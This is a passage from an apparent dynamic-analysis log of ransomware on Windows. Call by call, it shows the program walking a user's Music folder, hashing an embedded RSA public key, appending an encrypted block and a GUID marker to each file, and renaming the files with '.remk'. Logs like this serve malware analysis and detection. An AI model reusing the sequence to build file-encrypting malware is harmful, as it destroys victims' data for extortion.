KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.263] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.264] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.264] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.264] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.264] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.264] GetLastError () returned 0x0 [0234.264] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.264] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.264] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.264] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.264] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.264] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.264] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.265] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.265] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc813, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.265] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.265] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.265] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.265] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.265] CloseHandle (hObject=0x640) returned 1 [0234.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba600 [0234.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0234.270] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0234.270] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\5vtSd.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vbty960\\5vtsd.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\5vtSd.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vbty960\\5vtsd.wav.remk")) returned 1 [0234.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.271] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.271] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.272] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0234.273] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8073210, ftCreationTime.dwHighDateTime=0x1d5df98, ftLastAccessTime.dwLowDateTime=0xb7a014a0, ftLastAccessTime.dwHighDateTime=0x1d5dbdb, ftLastWriteTime.dwLowDateTime=0xb7a014a0, ftLastWriteTime.dwHighDateTime=0x1d5dbdb, nFileSizeHigh=0x0, nFileSizeLow=0x68e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H1p6Q94-hZHIiHNtL.m4a", cAlternateFileName="H1P6Q9~1.M4A")) returned 1 [0234.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.273] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.273] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.273] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\H1p6Q94-hZHIiHNtL.m4a") returned=".m4a" [0234.273] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\H1p6Q94-hZHIiHNtL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vbty960\\h1p6q94-hzhiihntl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.273] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=26849) returned 1 [0234.273] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.275] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x68bb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.275] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.277] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.277] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x68e1, lpOverlapped=0x0) returned 1 [0234.278] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.278] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.278] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.278] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.279] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.279] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.279] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.279] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.279] GetLastError () returned 0x0 [0234.279] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.279] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.279] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.279] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.279] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x68e0) returned 0x37c4278 [0234.279] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bc110 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6d0 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bc158 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee6e8 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee718 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee778 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee730 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.280] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee718 | out: hHeap=0x630000) returned 1 [0234.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee730 | out: hHeap=0x630000) returned 1 [0234.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee778 | out: hHeap=0x630000) returned 1 [0234.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee778 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee730 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee718 [0234.280] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee730 | out: hHeap=0x630000) returned 1 [0234.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee718 | out: hHeap=0x630000) returned 1 [0234.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee778 | out: hHeap=0x630000) returned 1 [0234.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.281] GetCurrentThreadId () returned 0x314 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c2ef0 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.282] GetCurrentThreadId () returned 0x314 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee778 [0234.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.282] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee718 [0234.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee730 [0234.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee700 [0234.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee790 [0234.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee760 [0234.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee748 [0234.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.283] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee7a8 [0234.283] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee748 | out: hHeap=0x630000) returned 1 [0234.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee748 [0234.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee760 | out: hHeap=0x630000) returned 1 [0234.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0234.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.284] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.284] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x68e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.284] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.285] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.285] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.285] CloseHandle (hObject=0x640) returned 1 [0234.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e568 [0234.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0234.286] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\H1p6Q94-hZHIiHNtL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vbty960\\h1p6q94-hzhiihntl.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\H1p6Q94-hZHIiHNtL.m4a.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vbty960\\h1p6q94-hzhiihntl.m4a.remk")) returned 1 [0234.288] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f05320, ftCreationTime.dwHighDateTime=0x1d5dd83, ftLastAccessTime.dwLowDateTime=0xa5c3afd0, ftLastAccessTime.dwHighDateTime=0x1d5e441, ftLastWriteTime.dwLowDateTime=0xa5c3afd0, ftLastWriteTime.dwHighDateTime=0x1d5e441, nFileSizeHigh=0x0, nFileSizeLow=0xa623, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L70E2.m4a", cAlternateFileName="")) returned 1 [0234.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.288] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e698 [0234.288] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\L70E2.m4a") returned=".m4a" [0234.288] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vbTY960\\L70E2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vbty960\\l70e2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.288] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=42531) returned 1 [0234.289] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.291] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa5fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.291] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: 